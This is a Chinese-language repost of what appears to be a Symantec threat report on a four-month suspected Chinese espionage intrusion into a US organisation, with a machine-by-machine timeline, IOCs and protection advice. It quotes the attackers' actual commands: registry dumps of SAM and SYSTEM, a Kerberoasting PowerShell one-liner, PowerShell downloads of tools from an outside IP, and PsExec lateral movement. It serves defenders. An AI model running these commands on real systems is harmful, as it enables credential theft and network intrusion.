top of page

美國某駐華組織在中國遭駭客攻擊:針對性入侵持續四個月

作家相片: Symantec Threat HunterSymantec Threat Hunter

近期,一家在中國擁有重要業務的美國大型組織,成為疑似中國駭客的攻擊目標。該攻擊於2024年4月至8月期間持續,駭客藉由入侵該組織的內部網路取得長期控制,推測目的是進行情報收集。此攻擊使用了一些過去已知與中國駭客有關的工具與技術,顯示攻擊者很可能來自中國。


攻擊行為與工具

攻擊者利用多種技術,包括:

  1. DLL 側載 (DLL Sideloading)透過合法的應用程式執行惡意的 DLL 檔案,攻擊者使用了 GoogleToolbarNotifier.exe 和 iTunesHelper.exe 等應用程式。

  2. Impacket一套用於操作網路協議的開源工具,常被用於遠端執行、憑證盜取、以及中繼攻擊。

  3. FileZilla 和 PSCPFileZilla 是一款 FTP 工具,PSCP 則是一種安全複製協議(SCP)客戶端,用於檔案傳輸。

  4. Living off the Land (LotL) 工具攻擊者善用目標系統內建工具,如:

● WMI(Windows Management Instrumentation): 微軟命令列工具 ,可用於在遠端電腦上執行命令。

●PsExec:  Microsoft Sysinternals 工具 ,用於在其他系統上執行進程。該工具主要被攻擊者用來在受害者網路上橫向移動。

●PowerShell: 微軟腳本工具 ,可用於執行命令、下載有效負載、遍歷受感染的網路以及進行偵察。


攻擊時間線

機器1:首次入侵

最初的感染媒介仍然未知。然而,惡意活動的第一個證據可以追溯到2024 年4 月11 日,當時透過WMI 在一台電腦上執行了一個可疑命令,該命令具有從網路上的另一台電腦利用Impacket 的工具的特徵:cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1712807675.4462686 2>&1

cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1712807675.4462686 2>&1


該命令源自網路上的另一台計算機這一事實表明,攻擊者已經破壞了組織網路上的至少另一台計算機,並且入侵可能在 4 月 11 日之前就開始了。


然後,攻擊者嘗試使用「net use」指令掛載網路共用。接下來,他們使用 reg.exe 從註冊表轉儲憑證: 

reg save hklm\system ss

reg save hklm\sam sa


一分鐘後,他們嘗試使用「net use」指令安裝另一個網路共用,特別是嘗試安裝連接到網路附加儲存(NAS)裝置的磁碟機。


幾個小時後,攻擊者返回並執行 netstat 以檢查所有開啟的 TCP(活動和偵聽)連線。 

然後,攻擊者執行了另一個編碼的 PowerShell 腳本,該腳本解碼為:

$ProgressPreference="SilentlyContinue";setspn.exe -T medin.local -Q / | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }


此指令在 Active Directory (AD) 中查詢服務主體名稱 (SPN),這些名稱是與 AD 內的服務關聯的帳戶。然後,該命令處理輸出以提取相關詳細信息,然後為每個匹配的 SPN 提取 Kerberos 安全性令牌。 


這是一種稱為 Kerberoasting 的策略,用於專門竊取服務帳戶的憑證,攻擊者可能會嘗試離線破解該憑證,以取得對特權帳戶的存取權限,以協助在網路中橫向移動。


值得注意的是,上述命令“medin.local”中指定的域是許多公開可用的 Kerberoast 工具和腳本中使用的預設域名,這表明攻擊者直接升級了現成的工具,而無需任何其他工具。


然後觀察到攻擊者修改了一些命令並執行了幾個進一步的 PowerShell 命令,這次使用了正確的域:

$ProgressPreference=“SilentlyContinue”;setspn -T [REMOVED] -Q /

$ProgressPreference=“SilentlyContinue”;klist

$ProgressPreference=“SilentlyContinue”;klist  tgt


「klist」指令列出使用者目前的 Kerberos 票證,以便可以了解使用者的活動 Kerberos 驗證狀態。此外,「tgt」指的是票證授予票證,它是一種特殊類型的票證,用於向金鑰分發中心 (KDC) 進行身份驗證。攻擊者可能會以此為目標,取得其他服務票證以嘗試離線破解。


4 月 16 日,當攻擊者透過 WMI 啟動命令提示字元時,惡意活動會在同一台電腦上恢復。

第二天,他們繼續執行一個名為 rc.exe 的文件,該文件是 Google 應用程式 GoogleToolbarNotifier 的重命名版本。該檔案用於旁載名為 gtn.dll 的惡意 DLL。


機器2:數據外流

惡意活動於 2024 年 6 月 2 日在第二台電腦(Web 伺服器)上開始。

cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1717319212.299007 2>&1

幾分鐘後,攻擊者運行了一個名為 putty.exe 的檔案。儘管有這個名稱,但該應用程式實際上是 FileZilla 的 SFTP 元件,它基於 PuTTY 的安全文件傳輸協定 (SFTP) 用戶端。這可能是為了資料外洩目的而安裝的。 


6 月 13 日,同一個文件透過 WMI 執行了多次。 

第二天(6月14日),使用PowerShell從遠端主機下載檔案到perflogs目錄: 

powershell (new-object System.Net.WebClient).DownloadFile( 'hxxp://149.28.154.23:443/rar.exe','CSIDL_SYSTEM_DRIVE\perflogs\rar.exe')

powershell (new-object System.Net.WebClient).DownloadFile( 'hxxp://149.28.154.23:443/vmtools.exe','CSIDL_SYSTEM_DRIVE\perflogs\vmtools.exe')


雖然未恢復,但 rar.exe 很可能是 WinRAR 的命令列版本。名為 vmtools.exe 的檔案是 PSCP 的重新命名版本,PSCP 是由與 PuTTY SSH 相同的開發人員建立的安全複製協定 (SCP) 用戶端。

這台電腦上的惡意活動於 6 月 27 日恢復,當時執行了許多命令,大部分是透過 PsExec 執行的。運行的檔案包括合法的 Google 應用程式 GoogleUpdate.exe。在這台機器上發現的可疑檔案中有兩個名為 ibnettle-6.dll 和 textinputhost.dat。其中一個或兩個檔案可能是旁加載的惡意檔案。 Sophos 和 Recorded Future 先前曾報告稱,Textinputhost.dat 被中國 Crimson Palace 組織用於攻擊東南亞目標。 


機器3:偵查行為

惡意活動於 6 月 2 日在第三台電腦上開始,當時使用 WMI 執行 wevtutil 以從網路上的遠端電腦查詢 Windows 事件日誌:

wevtutil qe security /rd:true /f:text /q:”*[System[(EventID=4624) or (EventID=4672) or (EventID=4634) or (EventID=4673) or (EventID=4740)]] and *[System[TimeCreated[timediff(@SystemTime)<=2592000000]]]”


此命令的結構是查詢安全事件日誌中的以下事件:

  • EventID=4624:成功的登入事件。

  • EventID=4672:指派給新登入的特殊權限。

  • EventID=4634:登出事件。

  • EventID=4673:表示呼叫了特權服務。

  • EventID=4740:帳號被鎖定。


隨後,攻擊者立即透過 WMI 執行 PowerShell 腳本:

cmd.exe /Q /c powershell echo ((new-object Net.Sockets.TcpClient).Connect(\”192.168.92.92\”,135)) “open!” 1> \\127.0.0.1\ADMIN$\__1717327352.4534295 2>&1


攻擊者可能正在使用此腳本來測試與網路上另一台電腦的連接,特別是為了確認 Microsoft 的遠端程序呼叫 (RPC) 服務是否可用(連接埠 135)。攻擊者也嘗試使用連接埠 3389(通常為 RDP 保留)連接到同一台電腦:

powershell echo ((new-object Net.Sockets.TcpClient).Connect(\”192.168.92.92\”,3389)) “open!”

攻擊者於 6 月 20 日捲土重來,並透過 PsExec 從網路上的另一台電腦 (192.168.88.235) 啟動命令提示字元。然後執行了幾個網路命令:

CSIDL_SYSTEM\net1 group “Exchange Servers” /domain


這些命令用於顯示與網域的特定群組有關的資訊。攻擊者特別感興趣的一組是“Exchange 伺服器”,這表明攻擊者試圖以郵件伺服器為目標來收集並可能洩露電子郵件資料。 


同一天晚些時候,透過 PsExec 執行了一個可疑的 PowerShell 命令:

powershell -exec bypass -command “Get-ADComputer -Filter {enabled -eq $true} -properties *|select Name, DNSHostName, OperatingSystem, LastLogonDate|Format-Table -AutoSize |Out-File -FilePath “ CSIDL_COMMON_APPDATA\computer.txt -Width ([int]::MaxValue)”


此指令從 Active Directory 擷取所有已啟用的電腦及其名稱、DNS 主機名稱、作業系統和上次登入日期。然後,它將資訊格式化為表格並將其儲存到名為computer.txt 的檔案中。幾分鐘後,執行 quser 命令以列出電腦上所有登入/已啟動的使用者帳戶。

第二天(6 月 21 日),該機器再次被用來在網路上的另一台機器上啟動命令提示字元:

PsExec64.exe \\192.168.92.79 -accepteula cmd


機器4:竊取 DLL 資訊

6 月 5 日,透過 WMI 在第四台電腦上執行了一條可疑命令: 

reg.exe export “HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs” CSIDL_WINDOWS\temp\ts_2011.tmp 


該命令將註冊表項值匯出到 .TMP 檔案。註冊表項 Control\Session Manager\KnownDLLs 包含受信任的 DLL 列表,系統通常在系統啟動期間從 System32 目錄載入這些 DLL,其他進程可能會利用這些 DLL。匯出此金鑰將複製與這些 KnownDLL 關聯的所有註冊表值,並可能向攻擊者提供有關哪些檔案名稱在重用時可能看起來無害的信息,或更有可能用於 DLL 劫持的目的。這是一種常見的攻擊,其中惡意 DLL 被放置在要載入的目錄中,而不是合法的系統 DLL。


機器5:再次利用側載技術

6 月 13 日,當透過 WMI 執行命令將目錄變更為根磁碟機時,第五台機器上開始活動。然後,攻擊者嘗試從 PerfLogs 目錄啟動應用程式 iTunesHelper.exe。這很可能是為了使用側面載入技術來載入惡意 DLL (CoreFoundation.dll) 而啟動的(我們之前已經看到使用 CoreFoundation.dll 使用相同的二進位檔案多次執行此操作)。


攻擊者身份線索

現有證據顯示該組織被中國駭客入侵。除了 DLL 側載是中國組織廣泛青睞的策略之外,該組織還在 2023 年成為了與中國 Daggerfly 組織有暫時聯繫的攻擊者的攻擊目標。 


SophosRecordedFuture先前曾報告稱,中國間諜組織 Crimson Palace 利用該文件 textinputhost.dat對東南亞進行攻擊。在這種情況下,它與名為 rc.exe 的可執行檔結合使用。進行此次攻擊的攻擊者也使用了相同的檔案名稱。


Symantec Endpoint Security 中的行為安全技術為我們的客戶提供對無檔案、Living Off the Land 和基於行為的攻擊的保護,包括非典型命令列活動和可疑應用程式行為,例如非進程可執行檔或DLL 旁載入.請在此處閱讀有關這些技術的更多資訊 。

有關最新防護更新,請造訪Symantec 防護公告


保護建議

  1. 行為式防禦

    使用如 Symantec Endpoint Security 的解決方案,偵測不正常命令行活動或側載行為。

  2. 快速更新與監控

    確保安全產品持續更新,及早發現異常。


相關指標 (IOC)

如果 IOC 是惡意的並且我們可以使用該文件,Symantec Endpoint 產品將偵測並封鎖該文件。

9affdcdb398d437e2e1cd9bc1ccf2d101d79fc6d87e95e960e50847a141faa4 — PsExec

51fe904458e216e75909f82a33dc4f163250b498b4e2d365880184e806d3db1a — iTunesHelper 

23221b6f95b9e3b165a84570212f2c8681cf888aa0fa78822f8500357eeafaf0 — CoreFoundation.dll 

86fd8328765e4803feedf5878a08c149c08d47c336578261a08a3e1933b68daa — PSCP(重新命名為 vmtools.exe)


472a513eb60cba4a2320ebbc10d84679ebaa1a8f90e5a3764902a456b3936a17 — libnettle-6.dll

f2fa6ae29306ed7171f2e9563ced9bbd6e337ed8c389b319df3c6b46eeb050f0 — 來自 FileZilla 的 SFTP 元件

c1bec59afd3c6071b461bb480ff88ba7e36759a949f4850cc26f0c18e4c811a0 — textinputhost.dat 

edfae1a69522f87b12c6dac3225d930e4848832e3c551ee1e7d31736bf4525ef — PsExec 

1f6b69d11a3066e21c40002a25986c44e24a66f023a40e5f49eecaea33f5576d — GoogleUpdate 

d32cc7b31a6f98c60abc313abc7d1143681f72de2bb2604711a0ba20710caaae — GoogleToolbarNotifier 

ff91bbe7bd4e6d5498b1332f0ad233dcf0ad5fc0d31f870a92142731354d739c — gtn.dll 

hxxp://149.28.154[.]23:443


完整指標列表可參考 Symantec 保護公告


此次攻擊事件揭露了針對大型組織的網路攻擊威脅。建議企業用戶都應強化資安防護,定期檢查系統異常行為,以降低類似威脅的風險。


原文出處 Symatnec Enterprise Blogs


Comments


bottom of page